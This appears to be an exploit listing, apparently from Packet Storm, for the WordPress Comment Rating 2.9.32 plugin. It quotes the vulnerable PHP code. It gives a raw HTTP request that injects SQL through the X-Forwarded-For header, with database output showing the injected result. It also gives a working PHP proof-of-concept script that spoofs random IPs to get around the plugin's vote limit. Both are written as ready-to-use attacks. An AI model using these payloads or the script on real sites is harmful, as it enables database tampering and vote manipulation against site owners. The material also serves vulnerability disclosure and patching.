exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Comment Rating 2.9.32 SQL Injection / Bypass

WordPress Comment Rating 2.9.32 SQL Injection / Bypass
Posted Feb 27, 2013
Authored by ebanyu

WordPress Comment Rating plugin version 2.9.32 suffers from vote limitation bypass and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection, bypass
SHA-256 | f3eff5dbde08320f1b9d6c19ee7a8ff2b8c4264d0143262e0b8d26506831ed4e
Download | Favorite | View

WordPress Comment Rating 2.9.32 SQL Injection / Bypass

Change Mirror Download
# Exploit Title: Wordpress plugin: Comment Rating SQL injection
# Google Dork:
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4
 
 
 
Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php
 
First take the IP from HTTP_X_FORWARDED_FOR header.
-----------------------------------------------------------------------
48         $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
49         if(strstr($row['ck_ips'], $ip)) {
50            // die('error|You have already voted on this item!');
51            // Just don't count duplicated votes
52            $duplicated = 1;
53            $ck_ips = $row['ck_ips'];
54         }
 
Later made a UPDATE without filter the input.
------------------------------------------------------------------------
77         $query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips  . "' WHERE ck_comment_id = $k_id";
 
 
So let's take a look in the DB
 
mysql> select * from wp_comment_rating;
+---------------+----------------+--------------+----------------+
| ck_comment_id | ck_ips         | ck_rating_up | ck_rating_down |
+---------------+----------------+--------------+----------------+
|             2 | ,20.209.10.130 |            1 |              0 |
|             3 |                |            0 |              0 |
+---------------+----------------+--------------+----------------+
2 rows in set (0.00 sec)
 
 
Now made a HTTP request with a injection in the HTTP_X_FORWARDED_FOR header:
 
GET /wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_ HTTP/1.1
Host: 192.168.1.10
Accept-Encoding: gzip, deflate
X-Forwarded-For: ', ck_ips=(select user()) WHERE ck_comment_id=2#
Connection: keep-alive
 
 
And the result is:
 
mysql> select * from wp_comment_rating;
+---------------+---------------------+--------------+----------------+
| ck_comment_id | ck_ips              | ck_rating_up | ck_rating_down |
+---------------+---------------------+--------------+----------------+
|             2 | wordpress@localhost |            2 |              0 |
|             3 |                     |            0 |              0 |
+---------------+---------------------+--------------+----------------+
2 rows in set (0.00 sec)
 
Cheers
 
=======================================================================================
 
 
# Exploit Title: Wordpress plugin: Comment Rating Bypass vote limitation
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4
 
 
Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php
 
First take the IP from HTTP_X_FORWARDED_FOR header.
-----------------------------------------------------------------------
48         $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
49         if(strstr($row['ck_ips'], $ip)) {
50            // die('error|You have already voted on this item!');
51            // Just don't count duplicated votes
52            $duplicated = 1;
53            $ck_ips = $row['ck_ips'];
54         }
 
Later made a UPDATE without filter the input.
------------------------------------------------------------------------
77         $query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips  . "' WHERE ck_comment_id = $k_id";
 
 
Now for bypass the vote limitation, we just have to add the HTTP_X_FORWARDED_FOR header and change it once per request.
 
A simple POC is made in php.
 
<?PHP
 
define('HOST','http://localhost/wordpress/');
define('IDCOMMENT',2);
$url=parse_url(HOST);
define('URL',$url['path'].'wp-content/plugins/comment-rating/ck-processkarma.php?id='.IDCOMMENT.'&action=add&path=a&imgIndex=1_14_');
for($i=0;$i<1;$i++) lvlup();
 
function lvlup(){
    global $url;
    $header = "GET ".URL." HTTP/1.1 \r\n";
    $header.= "Host: ".$url['host']."\r\n";
    $header.= "Accept-Encoding: gzip, deflate \r\n";
    $header.= "X-Forwarded-For: ".long2ip(rand(0, "4294967295"))."\r\n";
    $header.= "Connection: close \r\n\r\n";
    $socket  = socket_create(AF_INET, SOCK_STREAM,  SOL_TCP);
    socket_connect($socket,$url['host'], 80);
    socket_write($socket, $header);
    socket_close($socket);
}
 
?>

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close